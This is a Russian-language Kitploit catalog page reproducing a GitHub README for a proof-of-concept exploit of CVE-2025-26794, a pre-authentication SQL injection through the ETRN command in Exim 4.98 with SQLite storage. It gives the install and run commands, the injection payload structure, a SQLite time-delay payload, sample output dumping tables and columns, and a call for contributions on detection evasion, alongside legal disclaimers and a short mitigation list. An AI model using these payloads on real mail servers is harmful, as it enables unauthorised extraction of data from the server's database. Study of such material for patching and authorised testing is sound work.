Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

Эксплойт SQL-инъекции для CVE-2025-26794 в Exim 4.98. Автоматизированное извлечение данных через слепую SQL-инъекцию на основе временных задержек (time-based blind SQLi). Только для авторизованного тестирования на проникновение.

Репозиторий
2410 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-26794: Эксплойт SQL-инъекции ETRN в Exim

Python Version License Status

Эксплойт proof-of-concept для CVE-2025-26794, демонстрирующий уязвимость SQL-инъекции в почтовом сервере Exim 4.98 через команду ETRN при использовании DBM-хранилища SQLite.

⚠️ Правовое предупреждение

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предоставлен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированный доступ к компьютерным системам является незаконным согласно различным законам, включая:

  • Закон о компьютерном мошенничестве и злоупотреблениях (CFAA) в США
  • Закон о неправомерном использовании компьютеров в Великобритании
  • Аналогичное законодательство в других юрисдикциях

Вы должны иметь явное письменное разрешение перед тестированием любой системы, которая вам не принадлежит.

Авторы и участники не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.

📋 Обзор уязвимости

CVE-2025-26794 — это уязвимость SQL-инъекции в Exim 4.98, которая возникает, когда:

  • Exim настроен с DBM-хранилищем SQLite
  • Обработчик команды ETRN обрабатывает сериализованные данные
  • Пользовательский ввод недостаточно санируется перед построением SQL-запроса

Эта уязвимость позволяет атакующим:

  • Извлекать конфиденциальные данные из базы данных почтового сервера
  • Выполнять атаки time-based blind SQL-инъекции
  • Перечислять структуру базы данных (таблицы, столбцы, данные)

Затронутые версии

  • Exim 4.98 с конфигурацией SQLite DBM

Вектор атаки

  • Сетевой SMTP-сервис (обычно порт 25)
  • Аутентификация не требуется (команда ETRN доступна до аутентификации)

🚀 Возможности

  • Проверка уязвимости: Автоматическая проверка для подтверждения уязвимости цели
  • Слепая SQL-инъекция на основе времени: Использует методы временных задержек SQLite для извлечения данных
  • Оптимизация бинарного поиска: Эффективное посимвольное извлечение
  • Автоматический дамп базы данных: Извлекает таблицы, столбцы и образцы данных
  • Интерактивный режим: Интерактивное выполнение пользовательских SQL-запросов
  • Многорежимная работа: Гибкие стратегии извлечения

📦 Установка

Требования

  • Python 3.6 или выше
  • Сетевой доступ к целевому SMTP-серверу

Настройка

root@kitploit:~
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

💻 Использование

Базовый синтаксис

root@kitploit:~
python3 exploit.py <target> [options]

Краткие примеры

1. Проверка уязвимости цели

root@kitploit:~
python3 exploit.py 192.168.1.10 --test-only

2. Автоматический дамп базы данных

root@kitploit:~
python3 exploit.py mail.example.com --auto-dump

3. Интерактивный режим SQL-запросов

root@kitploit:~
python3 exploit.py 10.0.0.5 --interactive

4. Извлечение структуры конкретной таблицы

root@kitploit:~
python3 exploit.py 192.168.1.10 --table users --columns

5. Выполнение пользовательского SQL-запроса

root@kitploit:~
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"

Параметры командной строки

ПараметрОписание
hostЦелевое имя хоста или IP-адрес (обязательно)
-p, --portSMTP-порт (по умолчанию: 25)
-t, --timeoutТаймаут сокета в секундах (по умолчанию: 30)
--thresholdПорог временной задержки для обнаружения (по умолчанию: 0.8 с)
--test-onlyТолько проверить уязвимость, без извлечения данных
--auto-dumpАвтоматически выполнить дамп структуры и данных базы данных
--interactiveЗапустить интерактивную консоль SQL-запросов
--table TABLEЦелевая таблица для извлечения
--columnsИзвлечь имена столбцов (используйте с --table)
--query QUERYВыполнить пользовательский SQL-запрос

🔍 Как это работает

Схема атаки

  1. Подключение: Устанавливает SMTP-соединение с целевым сервером
  2. Измерение базовой линии: Отправляет обычную команду ETRN для измерения времени ответа
  3. Тест инъекции: Отправляет SQL-пейлоад с временной задержкой для подтверждения уязвимости
  4. Извлечение данных: Использует бинарный поиск с time-based blind SQLi для посимвольного извлечения данных

Структура SQL-инъекционного пейлоада

root@kitploit:~
ETRN #',1); <MALICIOUS_QUERY> /*

Пейлоад эксплуатирует недостаточную санитацию в обработчике сериализации ETRN, позволяя выполнить SQL-инъекцию в SQLite-запросы.

Обнаружение на основе времени

Использует специфичную для SQLite временную задержку:

root@kitploit:~
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))

Это создаёт измеримую задержку (~1-2 секунды) при истинном условии.

📊 Пример вывода

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email

🛡️ Меры защиты

Если вы используете Exim 4.98 с SQLite DBM:

  1. Обновите Exim: Обновитесь до исправленной версии (4.98.1 или новее)
  2. Проверка ввода: Внедрите строгую проверку команды ETRN
  3. Параметризованные запросы: Используйте подготовленные выражения для всех операций с базой данных
  4. Правила брандмауэра: Ограничьте SMTP-доступ доверенными сетями
  5. Отключите ETRN: Если не требуется, отключите команду ETRN в конфигурации Exim

🔧 Технические детали

Алгоритм бинарного поиска

Эксплойт использует бинарный поиск для эффективного извлечения символов:

  • Диапазон печатных ASCII: 32-126
  • Среднее количество запросов на символ: ~7 (log₂ 94)
  • Оптимизирован для минимального сетевого трафика

Используемые функции SQLite

  • unicode(): Получить ASCII-значение символа
  • substr(): Извлечь подстроку из результата
  • sqlite_master: Системная таблица для перечисления схемы
  • pragma_table_info(): Извлечение метаданных столбцов

📚 Ссылки

  • Данные CVE: CVE-2025-26794
  • Консультация по безопасности Exim: [Официальная консультация Exim]
  • SQL-инъекции OWASP: Руководство OWASP

🤝 Вклад в проект

Приветствуются вклады в виде:

  • Оптимизации производительности
  • Дополнительных методов извлечения
  • Методов обхода обнаружения
  • Исправлений ошибок и улучшений

Пожалуйста, убедитесь, что все вклады включают:

  • Понятную документацию
  • Рекомендации по ответственному раскрытию
  • Предупреждения о законности использования

📝 Лицензия

Этот проект выпущен исключительно в образовательных целях. Используйте ответственно и законно.

👤 Автор

XploitGh0st

  • GitHub: @XploitGh0st

🙏 Благодарности

  • Команде разработчиков Exim за ответственную работу с уязвимостью
  • Сообществу исследователей безопасности
  • Исследователям техники time-based инъекций в SQLite

⚖️ Ответственное раскрытие

Если вы обнаружите уязвимости с помощью этого инструмента:

  1. Не раскрывайте детали публично немедленно
  2. Свяжитесь с вендором/поддерживающим разработчиком в частном порядке
  3. Предоставьте разумное время для исправления (обычно 90 дней)
  4. Следуйте рекомендациям по скоординированному раскрытию

Помните: С большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.

Скачать инструмент